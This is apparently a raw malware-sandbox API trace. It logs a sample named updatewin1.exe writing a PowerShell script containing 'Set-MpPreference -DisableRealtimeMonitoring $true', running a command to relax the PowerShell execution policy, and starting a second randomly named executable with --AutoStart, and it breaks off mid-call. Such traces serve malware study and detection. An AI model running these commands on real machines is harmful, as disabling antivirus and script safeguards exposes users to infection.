\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4\x96ÍWHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x80) returned 0x60a0d8 [0114.387] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe")) returned 0x5f [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xdc) returned 0x60c168 [0114.387] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0114.387] GetLastError () returned 0x0 [0114.387] GetEnvironmentStringsW () returned 0x60c250* [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xaca) returned 0x60cd28 [0114.387] FreeEnvironmentStringsW (penv=0x60c250) returned 1 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x98) returned 0x60c250 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3e) returned 0x60c2f0 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6c) returned 0x60c338 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x6e) returned 0x60c3b0 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x78) returned 0x5f1188 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x62) returned 0x60c428 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f52d8 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60c498 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x28) returned 0x60a160 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1a) returned 0x60bd18 [0114.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4a) returned 0x60c4e8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x72) returned 0x5f1208 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5310 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f5348 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1c) returned 0x60bd40 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xd2) returned 0x60c540 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7c) returned 0x60c620 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60c6a8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3a) returned 0x60c6e8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x90) returned 0x60c730 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60c7c8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5380 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x60c7f8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x60c838 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60c888 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60d818 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x82) returned 0x60c8e8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f53b8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1e) returned 0x60bd68 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2c) returned 0x5f53f0 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60c978 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x60c9d8 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2a) returned 0x5f5428 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x60d860 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x60ca38 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x60ca98 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x5f5460 [0114.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x8c) returned 0x60cac8 [0114.389] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60cd28 | out: hHeap=0x5e0000) returned 1 [0114.389] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x800) returned 0x60cb60 [0114.390] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0114.390] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0114.401] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0114.403] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin" [0114.403] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x60d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" [0114.403] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0114.424] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0114.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0114.425] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0114.425] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0114.425] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0114.426] CloseHandle (hObject=0xa8) returned 1 [0114.427] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x70) returned 0x60ecd8 [0114.427] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x90) returned 0x60ed50 [0114.427] SetLastError (dwErrCode=0x0) [0114.428] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0114.428] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xa84, dwThreadId=0xa5c)) returned 1 [0114.604] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.916] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.918] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.937] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.950] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.963] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0114.979] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.009] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.017] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.039] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.046] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.126] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.145] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.156] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.167] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.910] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.929] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.931] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.947] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.981] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0115.997] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.015] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.040] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.055] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.072] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.087] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.104] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.118] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.134] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.150] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.199] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.211] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.236] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.243] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.274] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.289] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.316] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.328] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.367] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.389] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.400] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.414] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.430] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.451] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.461] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.483] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.497] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.509] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.523] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.539] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.586] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.602] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.617] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0116.633] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.128] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.132] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.150] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.163] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.178] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.218] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.225] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.272] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.293] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.595] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.604] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.615] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.631] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.646] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.675] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.678] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.693] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0117.709] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x453ea000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xa70" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0xa5c Thread: id = 108 os_tid = 0xad0 Thread: id = 109 os_tid = 0x674 Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x435e2000" os_pid = "0xacc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {5D30A503-88CB-42E2-9682-691A6CD2F5F6} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0xaec Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 123 os_tid = 0x524 Thread: id = 124 os_tid = 0x998 Thread: id = 125 os_tid = 0x358 Thread: id = 126 os_tid = 0x548 Thread: id = 127 os_tid = 0x750 Thread: id = 128 os_tid = 0x6a0 Thread: id = 129 os_tid = 0x68c Thread: id = 130 os_tid = 0x680 Thread: id = 131 os_tid = 0x66c Thread: id = 132 os_tid = 0x614 Thread: id = 133 os_tid = 0x5fc Thread: id = 134 os_tid = 0x188 Thread: id = 135 os_tid = 0x140 Thread: id = 136 os_tid = 0x128 Thread: id = 137 os_tid = 0x2b0 Thread: id = 138 os_tid = 0x130 Thread: id = 139 os_tid = 0x218 Thread: id = 140 os_tid = 0x1cc Thread: id = 173 os_tid = 0xa8c Thread: id = 174 os_tid = 0xa40 Thread: id = 176 os_tid = 0xb7c Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 141 os_tid = 0x244 Thread: id = 142 os_tid = 0x638 Thread: id = 143 os_tid = 0x554 Thread: id = 144 os_tid = 0x720 Thread: id = 145 os_tid = 0x668 Thread: id = 146 os_tid = 0x65c Thread: id = 147 os_tid = 0x144 Thread: id = 148 os_tid = 0x110 Thread: id = 149 os_tid = 0x3f0 Thread: id = 150 os_tid = 0x3ec Thread: id = 151 os_tid = 0x3e4 Thread: id = 152 os_tid = 0x3e0 Thread: id = 153 os_tid = 0x3d0 Thread: id = 154 os_tid = 0x3cc Thread: id = 155 os_tid = 0x398 Thread: id = 156 os_tid = 0x394 Thread: id = 157 os_tid = 0x384 Thread: id = 158 os_tid = 0x380 Thread: id = 159 os_tid = 0x368 Thread: id = 160 os_tid = 0x350 Thread: id = 161 os_tid = 0x33c Thread: id = 171 os_tid = 0xa7c Process: id = "15" image_name = "h1rxxmjek7fnkhtt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe" page_root = "0x20ccb000" os_pid = "0x55c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x498" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e67e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 177 os_tid = 0x560 [0195.197] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x695a9600, dwHighDateTime=0x1d5fd35)) [0195.197] GetCurrentProcessId () returned 0x55c [0195.197] GetCurrentThreadId () returned 0x560 [0195.197] GetTickCount () returned 0x11315e2 [0195.197] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=7937555006) returned 1 [0200.955] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0200.955] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2030000 [0200.957] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.957] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74eb4f2b [0200.957] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74eb1252 [0200.957] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74eb4208 [0200.957] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsFree") returned 0x74eb359f [0200.957] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.958] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.958] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.958] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.958] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.958] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.958] GetModuleHandleW 